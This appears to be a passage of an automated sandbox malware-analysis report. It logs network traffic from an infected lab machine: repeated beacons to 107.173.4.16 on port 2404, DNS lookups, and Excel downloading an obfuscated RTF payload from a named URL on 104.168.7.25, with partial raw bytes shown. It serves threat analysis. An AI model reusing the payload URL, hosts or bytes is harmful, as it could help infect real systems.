                                                                Oct 12, 2024 16:40:04.270975113 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.271039963 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.271126986 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.271173954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.274130106 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.277182102 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.355518103 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355690956 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355742931 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.355743885 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355778933 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355811119 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355844021 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355860949 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.355876923 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355910063 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355942965 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.355956078 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.355992079 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356024981 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356057882 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356090069 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.356090069 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356125116 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356173038 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.356177092 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356216908 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356249094 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356257915 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.356283903 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356316090 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356350899 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.356362104 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.358059883 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358174086 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358206034 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358228922 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.358257055 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358289957 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358325005 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358335972 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.358357906 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358392000 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358411074 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.358423948 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358458042 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358489990 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358506918 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.358521938 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358556986 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:04.358607054 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:04.719096899 CEST8049173178.237.33.50192.168.2.22
                                                                Oct 12, 2024 16:40:04.719177961 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:40:09.081331968 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.083265066 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.088895082 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.720805883 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.725878000 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.725948095 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.725972891 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.725999117 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.732770920 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.732824087 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.732853889 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.732898951 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.732944965 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.734618902 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.734683037 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.739681005 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.739710093 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.739737034 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.739774942 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.741519928 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.741570950 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.741599083 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.741630077 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.741657019 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.746840954 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.746867895 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.746895075 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.786154032 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:09.793206930 CEST240449172107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:09.793277979 CEST491722404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:39.071664095 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:40:39.102334023 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:40:39.107140064 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:41:08.058645010 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:08.416774988 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:09.070997953 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:41:09.118757963 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:09.249521017 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:41:09.254450083 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:41:10.320034027 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:12.722237110 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:17.542646885 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:27.152266979 CEST4917380192.168.2.22178.237.33.50
                                                                Oct 12, 2024 16:41:35.217910051 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:35.591902018 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:36.215873957 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:37.495209932 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:39.318146944 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:41:39.320404053 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:41:39.325622082 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:41:39.897490025 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:44.702291012 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:41:54.311911106 CEST4916980192.168.2.22104.168.7.25
                                                                Oct 12, 2024 16:42:09.089056015 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:42:09.122178078 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:42:09.126940966 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:42:39.102956057 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:42:39.104818106 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:42:39.109652042 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:43:09.109553099 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:43:09.111224890 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:43:09.116070986 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:43:39.133711100 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:43:39.135406971 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:43:39.140373945 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:44:09.229746103 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:44:09.231632948 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:44:09.236525059 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:44:39.321929932 CEST240449171107.173.4.16192.168.2.22
                                                                Oct 12, 2024 16:44:39.325938940 CEST491712404192.168.2.22107.173.4.16
                                                                Oct 12, 2024 16:44:39.330852032 CEST240449171107.173.4.16192.168.2.22
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 12, 2024 16:39:42.714364052 CEST5456253192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:42.728317976 CEST53545628.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:44.812314034 CEST5291753192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:44.825759888 CEST53529178.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:46.222738981 CEST6275153192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:46.235223055 CEST53627518.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:46.237077951 CEST5789353192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:46.243851900 CEST53578938.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:51.428133011 CEST5482153192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:51.434705019 CEST53548218.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:51.435782909 CEST5471953192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:51.442917109 CEST53547198.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:52.357556105 CEST4988153192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:52.370100021 CEST53498818.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:39:52.371568918 CEST5499853192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:39:52.379014015 CEST53549988.8.8.8192.168.2.22
                                                                Oct 12, 2024 16:40:03.053648949 CEST5278153192.168.2.228.8.8.8
                                                                Oct 12, 2024 16:40:03.062558889 CEST53527818.8.8.8192.168.2.22
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 12, 2024 16:39:42.714364052 CEST192.168.2.228.8.8.80x562eStandard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:44.812314034 CEST192.168.2.228.8.8.80xf5deStandard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.222738981 CEST192.168.2.228.8.8.80xeb58Standard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.237077951 CEST192.168.2.228.8.8.80x9544Standard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.428133011 CEST192.168.2.228.8.8.80x1100Standard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.435782909 CEST192.168.2.228.8.8.80x2664Standard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.357556105 CEST192.168.2.228.8.8.80xd97eStandard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.371568918 CEST192.168.2.228.8.8.80x9c5bStandard query (0)shuvi.ioA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:40:03.053648949 CEST192.168.2.228.8.8.80x87f8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 12, 2024 16:39:42.728317976 CEST8.8.8.8192.168.2.220x562eNo error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:42.728317976 CEST8.8.8.8192.168.2.220x562eNo error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:44.825759888 CEST8.8.8.8192.168.2.220xf5deNo error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:44.825759888 CEST8.8.8.8192.168.2.220xf5deNo error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.235223055 CEST8.8.8.8192.168.2.220xeb58No error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.235223055 CEST8.8.8.8192.168.2.220xeb58No error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.243851900 CEST8.8.8.8192.168.2.220x9544No error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:46.243851900 CEST8.8.8.8192.168.2.220x9544No error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.434705019 CEST8.8.8.8192.168.2.220x1100No error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.434705019 CEST8.8.8.8192.168.2.220x1100No error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.442917109 CEST8.8.8.8192.168.2.220x2664No error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:51.442917109 CEST8.8.8.8192.168.2.220x2664No error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.370100021 CEST8.8.8.8192.168.2.220xd97eNo error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.370100021 CEST8.8.8.8192.168.2.220xd97eNo error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.379014015 CEST8.8.8.8192.168.2.220x9c5bNo error (0)shuvi.io188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:39:52.379014015 CEST8.8.8.8192.168.2.220x9c5bNo error (0)shuvi.io188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 16:40:03.062558889 CEST8.8.8.8192.168.2.220x87f8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                • shuvi.io
                                                                • 104.168.7.25
                                                                • geoplugin.net
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249162104.168.7.25803564C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 16:39:43.511533976 CEST474OUTGET /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 104.168.7.25
                                                                Connection: Keep-Alive
                                                                Oct 12, 2024 16:39:44.018225908 CEST1236INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 14:39:43 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Thu, 10 Oct 2024 11:37:22 GMT
                                                                ETag: "15a24-6241dcb39afd0"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 88612
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/msword
                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 66 75 41 4d 31 6c 78 38 5a 6b 50 6e 62 6b 4f 43 69 6d 4f 35 64 56 33 72 48 76 73 4d 38 55 36 37 6b 49 31 64 64 63 4c 34 4b 68 76 43 68 69 6a 4f 57 38 30 43 4d 37 6f 70 62 4c 64 37 6b 32 4d 67 34 45 57 47 50 45 68 4f 45 52 49 47 7a 4c 4e 75 7d 0d 0d 7b 5c 32 31 33 32 39 32 37 37 33 36 28 3f 3f 38 30 b5 3c 32 3f 7c 5d 2d 7e a7 28 60 2c 2c 28 24 24 25 33 25 3e 2a 3f 5b 27 25 3f 39 37 30 60 36 40 39 25 32 34 3f 25 3e 3d 21 2f 3f 39 5d 2a 25 b0 60 5f 3a 3d b0 b5 2a 2d 21 38 5d 36 3f b0 2a 32 2b 3e 34 3c 33 33 3d 5b 3f b0 24 5d 26 25 2f 7e 2d 36 3e 2b 5f 23 2c 25 3f 3a 3b 2d 39 2c 3f 28 7c 36 27 3d 38 26 2d 36 39 25 2e 39 5b 3d 2a 7e 29 2e 2a 5b 34 5e 40 3f 33 25 3a 25 5d b5 24 3f 30 2f 5e 33 3f 21 34 5d 25 5d 3d 31 29 b0 3f 39 60 3c 24 5d 30 b0 32 3e 3b 3f 40 31 35 2c 3f 31 39 3f 27 21 21 3a 3f 3f 3f 29 b0 36 32 31 2a 39 2e 3f 3c 39 3f 23 27 2c 2a 3f 40 b0 29 3e 7c 39 34 2c 21 3c 25 27 b0 3f 2a 24 3f 3f 3a 3e 27 3f 39 5d 5f 60 3c 2b 5d 33 60 3d b0 25 30 b0 2f 2e 32 3f [TRUNCATED]
                                                                Data Ascii: {\rtf1{\*\fuAM1lx8ZkPnbkOCimO5dV3rHvsM8U67kI1ddcL4KhvChijOW80CM7opbLd7k2Mg4EWGPEhOERIGzLNu}{\2132927736(??80<2?|]-~(`,,($$%3%>*?['%?970`6@9%24?%>=!/?9]*%`_:=*-!8]6?*2+>4<33=[?$]&%/~-6>+_#,%?:;-9,?(|6'=8&-69%.9[=*~).*[4^@?3%:%]$?0/^3?!4]%]=1)?9`<$]02>;?@15,?19?'!!:???)621*9.?<9?#',*?@)>|94,!<%'?*$??:>'?9]_`<+]3`=%0/.2?|^07/>0&3/5%]|[!/3&4?%~?.|9#7]>--,~1`%.)>]?|+1^|6/35'?/310&^??8-,?8^/9:00|`:_^)>+&?,?2+#?[$|1+'$??(%(@=7)?%,26?<5?:^9.**_%!2?;10>^`7!?)7>83?`]7(3?4+0<=)%+~8?9?(?3^/@9_:&%5'^324_0!]*48'[??7#2~4?>~=4?[0(7@>@?5%.*3.6$1@??=?-01!`(@53.@$8$#9#?`($5?:|9#?%#@__?&?$?/6./5~>(?|0(/#_??%|,#-[@18?_%=?<~|1/96[^3,~4?>-+=#=|,/`;:~&??<]%?.[].78?.094.(_?.''(?!@]?@%_~/@%#@?~,~:?@@?2+|&?++>>#5?|@=1@.']~89+4~/=:`5<|*96,??%5>:+=;)9?+*&^^7(*;!?)<_(`(?`_;:(-=:?.!+@?=2~;?????:9?9<7*<)0%;6%7~%'??1~2*],3?5_?0].'2>*$'48:,/=<:=[$??*<=3?:1.;>7:4>^|9]^'4=+[^*~&%+@-?|`&.!]@|
                                                                Oct 12, 2024 16:39:44.018353939 CEST224INData Raw: 3a 39 25 3b 5b 2b 34 3f 2d 3c 27 40 35 29 36 3f b5 25 36 32 3f 3d 2d 29 3e 26 28 b5 3e 28 38 39 60 26 38 33 27 3f 2e 27 2d 7c 3f 2e 27 27 2c 27 2f 3f 3a 5d 33 60 b5 3f 7c 24 34 3d b5 25 25 32 7c 5e 5e 5b 37 38 2b 2b 3f 3a 3c 35 29 5b 32 7c 34 5d
                                                                Data Ascii: :9%;[+4?-<'@5)6?%62?=-)>&(>(89`&83'?.'-|?.'','/?:]3`?|$4=%%2|^^[78++?:<5)[2|4]?$'=?58)86=/?5<_(%#835*08+~=2+&.|>%|(9==3:?^^@9^%?)~?<*9,#??75-#_!*;?59?#%51~3|~*$+*$;!=^@<8=`:2/=6?*9.6:;'?%1#|,_'($=`8=/[1@';1#%15?3[7
                                                                Oct 12, 2024 16:39:44.018385887 CEST1236INData Raw: 33 2a 30 31 3b 3b 27 2b 30 32 2f 3f 27 2f 2e b5 2f 2e 40 40 37 5e 25 34 7e 32 2a b5 24 3f 40 25 38 3e 3c 7e 24 3a 2e 5e b5 3f 27 39 27 5d b0 3a 34 25 40 5e 38 7c 39 31 a7 2b 21 28 25 5d 33 2f 2b 2e 60 33 3f 2d 3e 60 36 36 3c 3a 3f 3f 2f b0 39 32
                                                                Data Ascii: 3*01;;'+02/?'/./.@@7^%4~2*$?@%8><~$:.^?'9']:4%@^8|91+!(%]3/+.`3?->`66<:??/92*>2##|:-0|?8|&>8&.+28~,'-%5|,*].#+2(/3-|+23;&?(9%=%1%:436?()?#%&_>?/1%'<?94/;|~2#>??.2>-47$(9<0~?$.9!2+)]8%?5%)-<;!-.[%?($*(%'(~%_,*?[0:_?;*8%%8,?$>%8#
                                                                Oct 12, 2024 16:39:44.018419027 CEST1236INData Raw: 5d 2f 26 7c 32 3a 27 23 2d 31 7e b5 2d 25 7e 2a a7 5e 3f a7 2f 3f 5b b5 7c 3f 26 3c a7 27 39 2e 25 39 3a 3a 2e 2f 2a 33 36 3f 3d 3f 3f b5 25 2a b0 3f 37 30 38 5d 23 2e b0 3f 35 b5 60 5b 29 2b 37 3f 2c 27 25 3e 21 30 2f 28 7e 34 27 21 26 30 2e 7c
                                                                Data Ascii: ]/&|2:'#-1~-%~*^?/?[|?&<'9.%9::./*36?=??%*?708]#.?5`[)+7?,'%>!0/(~4'!&0.|%.0:3?8<:2:3:-%[|5]5%'9^]<.??~4?;)`[~6..|48/?&/?!|81;:>^1?_:1`$4__(%+55'7%;!)[/%:6^*!4^)6'85<?`%]53,9?_(%_$>|0|/[?~8-?&/*&,'_]]).?/?|!]%,%!?(%.%<9#0
                                                                Oct 12, 2024 16:39:44.018454075 CEST1236INData Raw: 25 26 7e 3a 3c 3d 2c 24 2b 28 26 a7 3b 24 3f 3d 21 2d 2e 37 3f 28 3c 3a 24 3e 23 60 34 39 b0 32 2d b0 26 3f 2c 5f 3c 30 3b 3a 34 5b 5b 36 23 3f 3f 2b 31 a7 28 7c 26 36 a7 7c 3d a7 25 39 2b 30 35 37 39 5e 28 3f 5d 3d 3f 2e 25 3f 32 36 5f b0 3f 24
                                                                Data Ascii: %&~:<=,$+(&;$?=!-.7?(<:$>#`492-&?,_<0;:4[[6#??+1(|&6|=%9+0579^(?]=?.%?26_?$;%?!1?=25%>/|?0?-`~@&062263:.~3?^#??%<[6<$67!.<?]*?(7~*19'8[?*67+1_@2(;'4?57%,[?7!>%~3%(?%_!%*9[89!`0?-#~?`;!=065(7>~$>93<<#.9#/_?5)?/[0.=)4'0@*@!/?
                                                                Oct 12, 2024 16:39:44.018487930 CEST1236INData Raw: 36 33 60 35 5d 3f 3f 5e 3a 32 7c 21 3f 35 26 a7 b0 3d 32 2e 2e 5b 3f 34 34 25 2c 25 b5 3c 3f 34 5e 2a 39 7c 27 24 3b b0 3c 28 5e 37 3f 31 2a 2c 24 33 60 3f 3c 36 34 38 24 25 32 29 b5 5e 3c 2b 23 2e 37 5e 3b 33 26 a7 60 a7 29 39 2e 3a 34 2e 24 2b
                                                                Data Ascii: 63`5]??^:2|!?5&=2..[?44%,%<?4^*9|'$;<(^7?1*,$3`?<648$%2)^<+#.7^;3&`)9.:4.$+/~22?(19~](_-$`->[%]_%.?*[$[!,1~2#&#?<,*?2!>,9!,(?/;9_*&!|=-]%*[4[;;'?=&#17?>=2+>:?;>%?`;^[%<?@>?(67;|<]@8]5$1.@)2;4>],3#`65~!.;%??::?#(&*?/;?/28*^
                                                                Oct 12, 2024 16:39:44.018524885 CEST1236INData Raw: 3f 3f 5b b0 3d 2b 2e 37 3e 2c 2e 3d 36 b5 2e 3a 3b 33 21 33 b5 7e 39 3c 23 b0 33 21 38 5e 32 31 25 7e 2b 2c 3a 5f 34 b0 3f 35 3f 3c 33 38 29 7c 34 60 60 33 3f 3e 7c 23 3f 21 3a 2c a7 60 2d 7e 2a 2c b5 39 3e 3e 33 b0 29 2b 3b 40 7c 40 2c 3f 2f 2c
                                                                Data Ascii: ??[=+.7>,.=6.:;3!3~9<#3!8^21%~+,:_4?5?<38)|4``3?>|#?!:,`-~*,9>>3)+;@|@,?/,4@<3(?:7?1?~88?88|1?=%1/%]<$$0%5:'`=-?312]=/#:)/0)#:.46(/??=)_[%1/?':4~?^+>?*.)|91[%2*?$^.]/>1??02%;;%:,?$%?9<*+`7&|=;)['2!@?10&%>|$??|/??,-?0@;*.
                                                                Oct 12, 2024 16:39:44.018558025 CEST552INData Raw: 7c 24 b0 23 b5 5f 40 3e 27 3d 24 28 5d 5d a7 38 21 28 23 7e 3f 33 38 2f 34 5d 2d 3f 3f 27 3f b5 7c 33 2b 7e 2e 36 3f 3f 2a 5e 33 5d 2f 3f 3f 3d 3f 36 7c 3c 33 24 2e 2e 3f a7 31 2f 29 3f 32 a7 32 2c 29 3e 26 2c 3a 7e 5f 25 5b 3d 24 2e 2f 2a 39 24
                                                                Data Ascii: |$#_@>'=$(]]8!(#~?38/4]-??'?|3+~.6??*^3]/??=?6|<3$..?1/)?22,)>&,:~_%[=$./*9$3:?`)-#4%+>6$1%1]=%:%%;/.7&|&2)??~'(,[0>?8;#/:,'@<>`@??192554*.)%#=?46%.&#,0??!#_*=?[`|+0%8@+0%:;>1?5(?(^?21?!70_%'&.>8]!(!2:=>%[95&=|?9?4~])*8,^(8<=37?
                                                                Oct 12, 2024 16:39:44.018591881 CEST1236INData Raw: 2b a7 5b 3c 39 3f 2c 39 40 7c 5e 2a a7 34 3d 3f 25 3c 25 3b 25 3f 31 24 3f 33 2b 7e 2c 7c b0 31 25 39 36 38 33 b5 30 34 34 40 36 29 3a 27 b0 29 5b 5e 3f 2f 2a 3c 23 32 b0 28 35 3c 33 28 36 25 3b a7 2a 36 7c 32 34 b0 3f 60 2e 2f 2e 2c b5 27 37 b0
                                                                Data Ascii: +[<9?,9@|^*4=?%<%;%?1$?3+~,|1%9683044@6):')[^?/*<#2(5<3(6%;*6|24?`./.,'7:_(@8%?'_]89@[-9.~.`(/&?>?3:.~678@1+2.*/:805%../~(/',?^<$,2|=<#`^`=&|^;;?97;!==@:],?[.726&')*~4%%`<<6@_10<.[-]?=-49`;0@%64#863)(~7?:=~[%0:5#^1;2/.)&7=/'1
                                                                Oct 12, 2024 16:39:44.018634081 CEST1236INData Raw: 20 20 20 09 09 20 20 20 20 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20 20 20 09 20 20 09 20 20 20 20 20 09 20 20 20 20 09 09 20 20 20 36 61 33 37 0a 0d 0a 0d 0d 0d 0a 0a 0a 0a 0a 0a 0d 0a 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0d 0d 0a 0d 36 31 20 09
                                                                Data Ascii: 6a3761 602
